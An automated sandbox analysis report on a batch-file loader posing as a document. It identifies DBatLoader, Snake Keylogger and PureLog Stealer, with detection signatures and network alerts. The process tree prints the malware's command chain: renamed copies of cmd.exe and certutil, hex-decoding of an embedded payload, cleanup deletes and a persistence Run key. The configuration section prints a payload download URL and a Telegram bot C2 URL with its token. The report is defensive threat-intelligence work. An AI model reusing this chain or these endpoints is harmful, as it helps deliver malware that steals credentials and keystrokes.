Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F.O Pump Istek,Docx.bat

Overview

General Information

Sample name:F.O Pump Istek,Docx.bat
Analysis ID:1577663
MD5:0bdc3aeffe000c9c0c73a3faa2d001d8
SHA1:1c8bc96bd0e00b21d734f936aeaea1e612442912
SHA256:e11e4469c9c003f2b0074deada876e15f30afccae6178c5317e16cf5e6ee1ff6
Tags:batuser-Racco42
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 3344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3456 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3600 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 2948 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6968 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4676 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5560 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • spoolsv.COM (PID: 4896 cmdline: C:\Users\Public\Libraries\spoolsv.COM MD5: 46FC1E1BCA07585CF21CC37149F2B424)
      • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xzeheenC.pif (PID: 6760 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
    • alpha.exe (PID: 4936 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 3848 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Cneehezx.PIF (PID: 2844 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 46FC1E1BCA07585CF21CC37149F2B424)
    • cmd.exe (PID: 2288 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 3428 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 5856 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 46FC1E1BCA07585CF21CC37149F2B424)
    • cmd.exe (PID: 2960 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 7064 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2de8d:$a1: get_encryptedPassword
        • 0x661a5:$a1: get_encryptedPassword
        • 0x2de61:$a2: get_encryptedUsername
        • 0x66179:$a2: get_encryptedUsername
        • 0x2df25:$a3: get_timePasswordChanged
        • 0x6623d:$a3: get_timePasswordChanged
        • 0x2de3d:$a4: get_passwordField
        • 0x66155:$a4: get_passwordField
        • 0x2dea3:$a5: set_encryptedPassword
        • 0x661bb:$a5: set_encryptedPassword
        • 0x2dc70:$a7: get_logins
        • 0x65f88:$a7: get_logins
        • 0x2a3ae:$a10: KeyLoggerEventArgs
        • 0x626c6:$a10: KeyLoggerEventArgs
        • 0x2a37d:$a11: KeyLoggerEventArgsEventHandler
        • 0x62695:$a11: KeyLoggerEventArgsEventHandler
        • 0x2dd44:$a13: _encryptedPassword
        • 0x6605c:$a13: _encryptedPassword
        00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 98 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.xzeheenC.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          22.2.xzeheenC.pif.33966478.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            22.2.xzeheenC.pif.33966478.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x26c15:$a1: get_encryptedPassword
            • 0x26be9:$a2: get_encryptedUsername
            • 0x26cad:$a3: get_timePasswordChanged
            • 0x26bc5:$a4: get_passwordField
            • 0x26c2b:$a5: set_encryptedPassword
            • 0x269f8:$a7: get_logins
            • 0x23136:$a10: KeyLoggerEventArgs
            • 0x23105:$a11: KeyLoggerEventArgsEventHandler
            • 0x26acc:$a13: _encryptedPassword
            22.2.xzeheenC.pif.33966478.4.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2545d:$s1: UnHook
            • 0x253f9:$s2: SetHook
            • 0x25432:$s3: CallNextHook
            • 0x253c1:$s4: _hook
            16.2.xzeheenC.pif.2b37c896.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 202 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
              Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3344, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 3600, ProcessName: alpha.exe
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetFilename: C:\Windows \SysWOW64\svchost.exe
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
              Sigma detected: Parent in Public Folder Suspicious Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 3600, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 2948, ProcessName: extrac32.exe
              Sigma detected: Suspicious Program Location with Network Connections
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.166.143.48, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\spoolsv.COM, Initiated: true, ProcessId: 4896, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\spoolsv.COM, ProcessId: 4896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: C:\Users\Public\Libraries\spoolsv.COM, ParentImage: C:\Users\Public\Libraries\spoolsv.COM, ParentProcessId: 4896, ParentProcessName: spoolsv.COM, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6760, ProcessName: xzeheenC.pif

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T16:30:32.480752+010020283713Unknown Traffic192.168.2.849705185.166.143.48443TCP
              2024-12-18T16:30:34.912380+010020283713Unknown Traffic192.168.2.84970654.231.224.185443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T16:30:50.688444+010028530061A Network Trojan was detected192.168.2.849712149.154.167.220443TCP
              2024-12-18T16:31:02.663613+010028530061A Network Trojan was detected192.168.2.849714149.154.167.220443TCP
              2024-12-18T16:31:04.344285+010028530061A Network Trojan was detected192.168.2.849716149.154.167.220443TCP
              2024-12-18T16:31:04.689184+010028530061A Network Trojan was detected192.168.2.849717149.154.167.220443TCP
              2024-12-18T16:31:06.812386+010028530061A Network Trojan was detected192.168.2.849718149.154.167.220443TCP
              2024-12-18T16:31:08.747835+010028530061A Network Trojan was detected192.168.2.849719149.154.167.220443TCP
              2024-12-18T16:31:10.704238+010028530061A Network Trojan was detected192.168.2.849720149.154.167.220443TCP
              2024-12-18T16:31:10.764252+010028530061A Network Trojan was detected192.168.2.849721149.154.167.220443TCP
              2024-12-18T16:31:12.761499+010028530061A Network Trojan was detected192.168.2.849722149.154.167.220443TCP
              2024-12-18T16:31:14.686240+010028530061A Network Trojan was detected192.168.2.849723149.154.167.220443TCP
              2024-12-18T16:31:15.996167+010028530061A Network Trojan was detected192.168.2.849724149.154.167.220443TCP
              2024-12-18T16:31:16.617544+010028530061A Network Trojan was detected192.168.2.849725149.154.167.220443TCP
              2024-12-18T16:31:17.934127+010028530061A Network Trojan was detected192.168.2.849726149.154.167.220443TCP
              2024-12-18T16:31:18.671712+010028530061A Network Trojan was detected192.168.2.849727149.154.167.220443TCP
              2024-12-18T16:31:19.864481+010028530061A Network Trojan was detected192.168.2.849728149.154.167.220443TCP
              2024-12-18T16:31:20.612580+010028530061A Network Trojan was detected192.168.2.849729149.154.167.220443TCP
              2024-12-18T16:31:21.833676+010028530061A Network Trojan was detected192.168.2.849730149.154.167.220443TCP
              2024-12-18T16:31:22.019236+010028530061A Network Trojan was detected192.168.2.849731149.154.167.220443TCP
              2024-12-18T16:31:22.591469+010028530061A Network Trojan was detected192.168.2.849732149.154.167.220443TCP
              2024-12-18T16:31:23.787992+010028530061A Network Trojan was detected192.168.2.849733149.154.167.220443TCP
              2024-12-18T16:31:23.951822+010028530061A Network Trojan was detected192.168.2.849734149.154.167.220443TCP
              2024-12-18T16:31:24.551999+010028530061A Network Trojan was detected192.168.2.849735149.154.167.220443TCP
              2024-12-18T16:31:25.788542+010028530061A Network Trojan was detected192.168.2.849736149.154.167.220443TCP
              2024-12-18T16:31:25.971804+010028530061A Network Trojan was detected192.168.2.849737149.154.167.220443TCP
              2024-12-18T16:31:26.500406+010028530061A Network Trojan was detected192.168.2.849739149.154.167.220443TCP
              2024-12-18T16:31:27.855490+010028530061A Network Trojan was detected192.168.2.849740149.154.167.220443TCP
              2024-12-18T16:31:28.100958+010028530061A Network Trojan was detected192.168.2.849741149.154.167.220443TCP
              2024-12-18T16:31:28.522891+010028530061A Network Trojan was detected192.168.2.849742149.154.167.220443TCP
              2024-12-18T16:31:29.887429+010028530061A Network Trojan was detected192.168.2.849743149.154.167.220443TCP
              2024-12-18T16:31:30.216391+010028530061A Network Trojan was detected192.168.2.849744149.154.167.220443TCP
              2024-12-18T16:31:30.472105+010028530061A Network Trojan was detected192.168.2.849745149.154.167.220443TCP
              2024-12-18T16:31:31.922710+010028530061A Network Trojan was detected192.168.2.849746149.154.167.220443TCP
              2024-12-18T16:31:32.330279+010028530061A Network Trojan was detected192.168.2.849747149.154.167.220443TCP
              2024-12-18T16:31:32.616120+010028530061A Network Trojan was detected192.168.2.849748149.154.167.220443TCP
              2024-12-18T16:31:33.900100+010028530061A Network Trojan was detected192.168.2.849749149.154.167.220443TCP
              2024-12-18T16:31:34.280745+010028530061A Network Trojan was detected192.168.2.849750149.154.167.220443TCP
              2024-12-18T16:31:34.590263+010028530061A Network Trojan was detected192.168.2.849751149.154.167.220443TCP
              2024-12-18T16:31:35.846578+010028530061A Network Trojan was detected192.168.2.849752149.154.167.220443TCP
              2024-12-18T16:31:36.275680+010028530061A Network Trojan was detected192.168.2.849753149.154.167.220443TCP
              2024-12-18T16:31:36.524506+010028530061A Network Trojan was detected192.168.2.849754149.154.167.220443TCP
              2024-12-18T16:31:37.859210+010028530061A Network Trojan was detected192.168.2.849755149.154.167.220443TCP
              2024-12-18T16:31:38.339505+010028530061A Network Trojan was detected192.168.2.849756149.154.167.220443TCP
              2024-12-18T16:31:38.535822+010028530061A Network Trojan was detected192.168.2.849757149.154.167.220443TCP
              2024-12-18T16:31:39.899974+010028530061A Network Trojan was detected192.168.2.849758149.154.167.220443TCP
              2024-12-18T16:31:40.310619+010028530061A Network Trojan was detected192.168.2.849759149.154.167.220443TCP
              2024-12-18T16:31:40.653167+010028530061A Network Trojan was detected192.168.2.849760149.154.167.220443TCP
              2024-12-18T16:31:41.882588+010028530061A Network Trojan was detected192.168.2.849761149.154.167.220443TCP
              2024-12-18T16:31:42.326208+010028530061A Network Trojan was detected192.168.2.849763149.154.167.220443TCP
              2024-12-18T16:31:42.640795+010028530061A Network Trojan was detected192.168.2.849764149.154.167.220443TCP
              2024-12-18T16:31:43.858813+010028530061A Network Trojan was detected192.168.2.849765149.154.167.220443TCP
              2024-12-18T16:31:44.332216+010028530061A Network Trojan was detected192.168.2.849766149.154.167.220443TCP
              2024-12-18T16:31:44.995632+010028530061A Network Trojan was detected192.168.2.849767149.154.167.220443TCP
              2024-12-18T16:31:45.917770+010028530061A Network Trojan was detected192.168.2.849773149.154.167.220443TCP
              2024-12-18T16:31:46.378304+010028530061A Network Trojan was detected192.168.2.849774149.154.167.220443TCP
              2024-12-18T16:31:47.006050+010028530061A Network Trojan was detected192.168.2.849775149.154.167.220443TCP
              2024-12-18T16:31:47.892071+010028530061A Network Trojan was detected192.168.2.849781149.154.167.220443TCP
              2024-12-18T16:31:48.438192+010028530061A Network Trojan was detected192.168.2.849782149.154.167.220443TCP
              2024-12-18T16:31:49.073363+010028530061A Network Trojan was detected192.168.2.849783149.154.167.220443TCP
              2024-12-18T16:31:50.059103+010028530061A Network Trojan was detected192.168.2.849788149.154.167.220443TCP
              2024-12-18T16:31:50.488087+010028530061A Network Trojan was detected192.168.2.849789149.154.167.220443TCP
              2024-12-18T16:31:51.012319+010028530061A Network Trojan was detected192.168.2.849790149.154.167.220443TCP
              2024-12-18T16:31:52.001020+010028530061A Network Trojan was detected192.168.2.849795149.154.167.220443TCP
              2024-12-18T16:31:52.477531+010028530061A Network Trojan was detected192.168.2.849796149.154.167.220443TCP
              2024-12-18T16:31:52.945796+010028530061A Network Trojan was detected192.168.2.849798149.154.167.220443TCP
              2024-12-18T16:31:53.939476+010028530061A Network Trojan was detected192.168.2.849803149.154.167.220443TCP
              2024-12-18T16:31:54.433734+010028530061A Network Trojan was detected192.168.2.849804149.154.167.220443TCP
              2024-12-18T16:31:55.158613+010028530061A Network Trojan was detected192.168.2.849806149.154.167.220443TCP
              2024-12-18T16:31:56.057954+010028530061A Network Trojan was detected192.168.2.849807149.154.167.220443TCP
              2024-12-18T16:31:56.408709+010028530061A Network Trojan was detected192.168.2.849812149.154.167.220443TCP
              2024-12-18T16:31:57.187012+010028530061A Network Trojan was detected192.168.2.849814149.154.167.220443TCP
              2024-12-18T16:31:58.000494+010028530061A Network Trojan was detected192.168.2.849815149.154.167.220443TCP
              2024-12-18T16:31:58.399296+010028530061A Network Trojan was detected192.168.2.849820149.154.167.220443TCP
              2024-12-18T16:31:59.117942+010028530061A Network Trojan was detected192.168.2.849822149.154.167.220443TCP
              2024-12-18T16:31:59.927636+010028530061A Network Trojan was detected192.168.2.849823149.154.167.220443TCP
              2024-12-18T16:32:00.329493+010028530061A Network Trojan was detected192.168.2.849824149.154.167.220443TCP
              2024-12-18T16:32:01.052862+010028530061A Network Trojan was detected192.168.2.849829149.154.167.220443TCP
              2024-12-18T16:32:01.868337+010028530061A Network Trojan was detected192.168.2.849831149.154.167.220443TCP
              2024-12-18T16:32:02.341158+010028530061A Network Trojan was detected192.168.2.849832149.154.167.220443TCP
              2024-12-18T16:32:03.019235+010028530061A Network Trojan was detected192.168.2.849837149.154.167.220443TCP
              2024-12-18T16:32:03.802557+010028530061A Network Trojan was detected192.168.2.849839149.154.167.220443TCP
              2024-12-18T16:32:04.325835+010028530061A Network Trojan was detected192.168.2.849840149.154.167.220443TCP
              2024-12-18T16:32:04.948770+010028530061A Network Trojan was detected192.168.2.849845149.154.167.220443TCP
              2024-12-18T16:32:05.801697+010028530061A Network Trojan was detected192.168.2.849847149.154.167.220443TCP
              2024-12-18T16:32:06.314616+010028530061A Network Trojan was detected192.168.2.849848149.154.167.220443TCP
              2024-12-18T16:32:06.968984+010028530061A Network Trojan was detected192.168.2.849849149.154.167.220443TCP
              2024-12-18T16:32:07.717327+010028530061A Network Trojan was detected192.168.2.849855149.154.167.220443TCP
              2024-12-18T16:32:08.257271+010028530061A Network Trojan was detected192.168.2.849856149.154.167.220443TCP
              2024-12-18T16:32:08.901466+010028530061A Network Trojan was detected192.168.2.849857149.154.167.220443TCP
              2024-12-18T16:32:09.703549+010028530061A Network Trojan was detected192.168.2.849862149.154.167.220443TCP
              2024-12-18T16:32:10.250925+010028530061A Network Trojan was detected192.168.2.849864149.154.167.220443TCP
              2024-12-18T16:32:10.902595+010028530061A Network Trojan was detected192.168.2.849865149.154.167.220443TCP
              2024-12-18T16:32:11.808175+010028530061A Network Trojan was detected192.168.2.849870149.154.167.220443TCP
              2024-12-18T16:32:12.262918+010028530061A Network Trojan was detected192.168.2.849872149.154.167.220443TCP
              2024-12-18T16:32:13.086608+010028530061A Network Trojan was detected192.168.2.849873149.154.167.220443TCP
              2024-12-18T16:32:13.746832+010028530061A Network Trojan was detected192.168.2.849878149.154.167.220443TCP
              2024-12-18T16:32:14.189950+010028530061A Network Trojan was detected192.168.2.849879149.154.167.220443TCP
              2024-12-18T16:32:15.063620+010028530061A Network Trojan was detected192.168.2.849881149.154.167.220443TCP
              2024-12-18T16:32:15.662738+010028530061A Network Trojan was detected192.168.2.849882149.154.167.220443TCP
              2024-12-18T16:32:16.140324+010028530061A Network Trojan was detected192.168.2.849887149.154.167.220443TCP
              2024-12-18T16:32:16.999349+010028530061A Network Trojan was detected192.168.2.849889149.154.167.220443TCP
              2024-12-18T16:32:17.610863+010028530061A Network Trojan was detected192.168.2.849890149.154.167.220443TCP
              2024-12-18T16:32:18.148964+010028530061A Network Trojan was detected192.168.2.849895149.154.167.220443TCP
              2024-12-18T16:32:19.097134+010028530061A Network Trojan was detected192.168.2.849897149.154.167.220443TCP
              2024-12-18T16:32:19.792327+010028530061A Network Trojan was detected192.168.2.849898149.154.167.220443TCP
              2024-12-18T16:32:20.211914+010028530061A Network Trojan was detected192.168.2.849900149.154.167.220443TCP
              2024-12-18T16:32:21.039962+010028530061A Network Trojan was detected192.168.2.849905149.154.167.220443TCP
              2024-12-18T16:32:21.724028+010028530061A Network Trojan was detected192.168.2.849906149.154.167.220443TCP
              2024-12-18T16:32:22.213226+010028530061A Network Trojan was detected192.168.2.849908149.154.167.220443TCP
              2024-12-18T16:32:23.000800+010028530061A Network Trojan was detected192.168.2.849913149.154.167.220443TCP
              2024-12-18T16:32:23.920372+010028530061A Network Trojan was detected192.168.2.849914149.154.167.220443TCP
              2024-12-18T16:32:24.526429+010028530061A Network Trojan was detected192.168.2.849915149.154.167.220443TCP
              2024-12-18T16:32:25.067294+010028530061A Network Trojan was detected192.168.2.849920149.154.167.220443TCP
              2024-12-18T16:32:25.893931+010028530061A Network Trojan was detected192.168.2.849922149.154.167.220443TCP
              2024-12-18T16:32:26.538935+010028530061A Network Trojan was detected192.168.2.849924149.154.167.220443TCP
              2024-12-18T16:32:26.984961+010028530061A Network Trojan was detected192.168.2.849927149.154.167.220443TCP
              2024-12-18T16:32:27.815307+010028530061A Network Trojan was detected192.168.2.849930149.154.167.220443TCP
              2024-12-18T16:32:28.583007+010028530061A Network Trojan was detected192.168.2.849931149.154.167.220443TCP
              2024-12-18T16:32:28.906098+010028530061A Network Trojan was detected192.168.2.849934149.154.167.220443TCP
              2024-12-18T16:32:30.317157+010028530061A Network Trojan was detected192.168.2.849938149.154.167.220443TCP
